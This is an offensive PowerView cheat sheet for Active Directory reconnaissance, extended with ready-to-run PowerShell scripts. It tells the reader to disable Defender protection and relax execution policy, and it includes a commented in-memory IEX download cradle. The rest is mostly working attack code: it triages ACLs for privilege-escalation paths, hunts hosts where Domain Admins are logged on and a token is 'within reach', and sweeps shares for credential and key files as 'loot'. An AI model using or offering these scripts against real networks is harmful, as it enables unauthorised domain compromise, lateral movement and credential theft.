PowerView
Setup
Download PowerSploit (the Recon folder is the PowerView module) from the dev branch here:
https://github.com/PowerShellMafia/PowerSploit/tree/dev
Copy the Recon folder to a module path, e.g. C:\Windows\System32\WindowsPowerShell\v1.0\Modules (machine-wide, needs admin) or %USERPROFILE%\Documents\WindowsPowerShell\Modules (per user, no admin needed)
Add the folder as a Windows Defender exclusion or disable real-time protection first; PowerView is signatured and will be quarantined on copy otherwise
Set an unrestricted PowerShell execution policy (the default LocalMachine scope needs an elevated prompt; add -Scope CurrentUser to avoid it):
Set-ExecutionPolicy -ExecutionPolicy Unrestricted
Import the Recon module (PowerView; the old Get-Net* names are kept as aliases of the 3.0 Get-Domain* functions):
Import-Module Recon
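The full setup as one script, added here as an example and not part of the original cheat sheet or of PowerSploit. It assumes the dev branch was cloned to C:\Tools\PowerSploit (an assumption; adjust the path) and installs to the per-user module path so no elevation is needed:

```powershell
# Added example: install PowerSploit's Recon module (PowerView) for the current user
# and verify it loaded. $src is an assumed local clone of the dev branch.
$src  = 'C:\Tools\PowerSploit\Recon'
$dest = Join-Path ([Environment]::GetFolderPath('MyDocuments')) 'WindowsPowerShell\Modules\Recon'

# The folder name must equal the module name (Recon) or Import-Module will not find it.
New-Item -ItemType Directory -Force -Path $dest | Out-Null
Copy-Item -Path (Join-Path $src '*') -Destination $dest -Recurse -Force

# CurrentUser scope needs no admin rights, unlike the machine-wide Unrestricted setting.
# Bypass also skips the "downloaded from the internet" prompt that Unrestricted still shows.
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force

Import-Module Recon -ErrorAction Stop

# Sanity check: the 3.0 function and its 2.0 alias should both resolve.
Get-Command Get-DomainUser, Get-NetUser | Select-Object Name, CommandType

# Alternative when writing to disk is undesirable: load PowerView straight into memory.
# This still passes through AMSI/Defender, so the exclusion step above applies either way.
# IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')

Get-NetDomain
```

If Get-Command returns nothing for Get-NetUser, the module loaded but the aliases did not export; dot-source Recon\PowerView.ps1 directly instead of importing the module.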
Domain Info
Display Current Domain
Get-NetDomain
Get-NetDomain -Domain <DomainName>
Display Verbose Domain Info (Get-ADDomain is from the ActiveDirectory RSAT module, not PowerView, and needs RSAT installed)
Get-ADDomain
Get-ADDomain -Identity <DomainName>
Get Domain SID
Get-DomainSID
Get Domain Controllers (Get-ADDomainController is RSAT; Get-NetDomainController is the PowerView alias of Get-DomainController, which takes -Domain rather than -Identity)
Get-ADDomainController
Get-NetDomainController
Get-NetDomainController -Domain <DomainName>
Detailed Domain Info
Get Domain Policy (in PowerView 3.0 Get-DomainPolicy is an alias of Get-DomainPolicyData; it parses the default domain GPO's GptTmpl.inf for password and lockout settings)
Get-DomainPolicy
Get Domain Shares
Find-DomainShare
Find-DomainShare -CheckShareAccess
Get GPOs (Get-NetGPO is an alias of Get-DomainGPO; PowerView 2.0 used -ComputerName and -GPOname for the parameters below)
Get-NetGPO
Get-NetGPO -ComputerIdentity <Name of the PC>
Get-NetGPO -Identity <GPO display name or GUID>
Display OUs
Get-NetOU
Display ACLs (Get-ObjectAcl is an alias of Get-DomainObjectAcl; PowerView 2.0 used -SamAccountName instead of -Identity)
Get-ObjectAcl -Identity <Account Name> -ResolveGUIDs
Find Interesting Access Control Entries (Invoke-ACLScanner is an alias of Find-InterestingDomainAcl; -ResolveGUIDs turns extended-right GUIDs into names such as User-Force-Change-Password)
Invoke-ACLScanner -ResolveGUIDs
Display ACL of Specified Path
Get-PathAcl -Path "\\Path\Of\A\Share"
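Invoke-ACLScanner returns every non-default ACE it finds, which in a mature domain is thousands of rows. The triage below is an added example, not part of the original cheat sheet or of PowerView, and assumes the Recon module is imported and the shell runs as an ordinary domain user. The principal exclusion list is an assumption to tune per environment, and <TargetUser> is a placeholder:

```powershell
# Added example: reduce Find-InterestingDomainAcl output to ACEs that grant control
# of an object to principals that should not normally hold it.
Import-Module Recon

# Rights that translate directly into control of the target object.
$abusable = 'GenericAll|GenericWrite|WriteOwner|WriteDacl|WriteProperty|ExtendedRight'
# Principals expected to hold such rights on most objects (assumed baseline; adjust).
$expected = '^(Domain Admins|Enterprise Admins|Administrators|SYSTEM|Account Operators|Exchange)'

$hits = Find-InterestingDomainAcl -ResolveGUIDs |
    Where-Object {
        $_.ActiveDirectoryRights -match $abusable -and
        $_.IdentityReferenceName -notmatch $expected -and
        $_.IdentityReferenceClass -in @('user', 'group', 'computer')
    } |
    Select-Object IdentityReferenceName, IdentityReferenceClass,
                  ActiveDirectoryRights, ObjectAceType, ObjectDN

$hits | Sort-Object IdentityReferenceName | Format-Table -AutoSize

# Drill into one object: who can reset this account's password?
# -RightsFilter ResetPassword keeps only the User-Force-Change-Password extended right.
Get-DomainObjectAcl -Identity '<TargetUser>' -ResolveGUIDs -RightsFilter ResetPassword |
    ForEach-Object {
        [pscustomobject]@{
            Principal = ConvertFrom-SID $_.SecurityIdentifier   # SID -> DOMAIN\name
            Right     = $_.ObjectAceType
            Target    = $_.ObjectDN
        }
    }
```

Group hits by IdentityReferenceName: a low-privilege group that appears with GenericAll or WriteDacl over a user, group or GPO is a privilege-escalation path, and the second query is how you confirm the exact right before touching the object.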
Display Domains of Forest
Get-NetForestDomain
Display Domain Trusts (Get-ADTrust is RSAT, not PowerView; PowerView's own commands are Get-NetDomainTrust, an alias of Get-DomainTrust, and Get-DomainTrustMapping for all reachable trusts)
Get-ADTrust -Filter *
Get-ADTrust -Identity <DomainName>
Display Local AppLocker Effective Policy (built-in AppLocker module; shows what the host will let you run before you drop tooling)
Get-AppLockerPolicy -Effective
Computer Info
Display Domain Computers (Get-ADComputer is RSAT)
Get-ADComputer -Filter * -Properties *
All Computer Objects via PowerView (Get-NetComputer is an alias of Get-DomainComputer; returns the full LDAP attribute set with no RSAT dependency)
Get-NetComputer
User Info
Get User Info
Get-NetUser
Get-NetUser -SamAccountName <user>
Get-NetUser | select cn
Get Logged on User Info
Get-NetLoggedon -ComputerName <ComputerName>
Get Session Info for Machine
Get-NetSession -ComputerName <ComputerName>
Get Machines Where Targeted Users Are Logged In (Find-DomainUserLocation is the 3.0 name of Invoke-UserHunter; by default it hunts members of Domain Admins, not the current user)
Find-DomainUserLocation
Get Detailed User Info (Get-ADUser is RSAT)
Get-ADUser -Properties * -Filter *
Group Info
Get Members of a Specified Group (direct members only; use Get-DomainGroupMember -Identity <GroupName> -Recurse to expand nested groups)
Get-DomainGroup -Identity <GroupName> | Select-Object -ExpandProperty member
Display All Groups
Get-NetGroup
Display Detailed Info on All Groups (Get-ADGroup is RSAT)
Get-ADGroup -Properties * -Filter *
User Hunting
Find all Machines Where Current User is Local Admin
Find-LocalAdminAccess -Verbose
Find Local Admins on Machines
Invoke-EnumerateLocalAdmin -Verbose
Find Machines Where Domain Admins or a Specified Group Have Sessions (Invoke-UserHunter is an alias of Find-DomainUserLocation; PowerView 2.0 used -GroupName for the group parameter)
Invoke-UserHunter
Invoke-UserHunter -UserGroupIdentity <GroupName>
Invoke-UserHunter -CheckAccess
Invoke-UserHunter -Stealth
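The hunting switches above are most useful combined, so that the output is already filtered to hosts you can act on. The script below is an added example, not part of the original cheat sheet or of PowerView; it assumes the Recon module is imported and uses <GroupName> as a placeholder:

```powershell
# Added example: hunt for sessions of a target group and keep only the hosts where the
# current user is already local admin, i.e. where a logged-on token is within reach.
Import-Module Recon

# -CheckAccess populates the LocalAdmin field for each host with a hit.
# -Stealth queries only likely-busy hosts (file servers, DCs, DFS); drop it for a full sweep.
$targets = Find-DomainUserLocation -UserGroupIdentity '<GroupName>' -CheckAccess -Stealth

$reachable = $targets |
    Where-Object { $_.LocalAdmin } |
    Select-Object UserName, ComputerName, IPAddress, SessionFrom, LocalAdmin -Unique

$reachable | Format-Table -AutoSize

# Confirm before acting. A NetSessionEnum hit (SessionFrom set) is only a share connection;
# a NetWkstaUserEnum hit means an interactive or service logon, so a token actually exists.
foreach ($computer in ($reachable | Select-Object -ExpandProperty ComputerName -Unique)) {
    Get-NetLoggedon -ComputerName $computer |
        Where-Object { $_.UserName -and $_.UserName -notmatch '\$$' } |   # drop machine accounts
        Select-Object @{ n = 'ComputerName'; e = { $computer } }, UserName, LogonDomain
}
```

Every Get-NetSession and Get-NetLoggedon call is an SMB connection to the target, so the second loop is noisy; run it against the short list only.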
Loot Hunting
Use a domain account to enumerate the names of all files readable on network shares (legacy PowerView pipeline: Invoke-ShareFinderThreaded and the '\\host\share \t- comment' text format it scrapes belong to the pre-3.0 release, not the dev branch)
# Exclude the default admin shares, pull the UNC path out of each text line, and list it recursively
Invoke-ShareFinderThreaded -ExcludedShares 'IPC$','PRINT$','ADMIN$' |
    Select-String '^(.*) \t-' |
    ForEach-Object { Get-ChildItem -Recurse $_.Matches[0].Groups[1].Value |
        Select-Object FullName |
        Out-File -Append files.txt }
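On the dev branch Find-DomainShare returns objects rather than text, so the same sweep needs no regex and can filter by file type as it goes. This is an added example, not part of the original cheat sheet or of PowerView; it assumes the Recon module is imported, and the extension list is an assumption about what counts as loot:

```powershell
# Added example: PowerView 3.0 equivalent of the legacy ShareFinder pipeline.
Import-Module Recon

# Default admin shares (IPC$, PRINT$, ADMIN$, C$ ...) rarely hold loot and are slow to walk.
$skip        = 'IPC\$|PRINT\$|ADMIN\$|^[A-Z]\$$'
# Assumed loot extensions: credential stores, configs, scripts, backups, office docs.
$interesting = '\.(kdbx|config|xml|ps1|bat|vbs|txt|ini|rdp|pem|pfx|ppk|sql|bak|docx?|xlsx?)$'

# -CheckShareAccess drops shares the current user cannot open, so only readable paths remain.
Find-DomainShare -CheckShareAccess |
    Where-Object { $_.Name -notmatch $skip } |
    ForEach-Object {
        $unc = "\\$($_.ComputerName)\$($_.Name)"
        # SilentlyContinue: an unreadable subfolder must not abort the whole sweep.
        Get-ChildItem -Path $unc -Recurse -File -ErrorAction SilentlyContinue |
            Where-Object { $_.Name -match $interesting } |
            Select-Object FullName, Length, LastWriteTime
    } |
    Tee-Object -FilePath files.txt |      # keep a copy on disk and still show it live
    Format-Table -AutoSize
```

PowerView 3.0 also ships Find-InterestingDomainShareFile, which does this walk natively with -Include patterns and -OfficeDocs/-FreshEXEs switches; the hand-rolled version is useful when you want to control the exclusion and extension logic yourself.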
PowerView Resources
https://powersploit.readthedocs.io/en/latest/Recon/
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
http://www.harmj0y.net/blog/tag/powerview/
http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
http://www.harmj0y.net/blog/redteaming/powerview-2-0/
http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
http://www.slideshare.net/harmj0y/i-have-the-powerview
https://adsecurity.org/?p=2535
https://www.youtube.com/watch?v=rpwrKhgMd7E
PowerView-like tool for systems without PowerShell: https://github.com/mubix/netview
PowerView enumeration walkthrough: https://www.hackingarticles.in/active-directory-enumeration-powerview/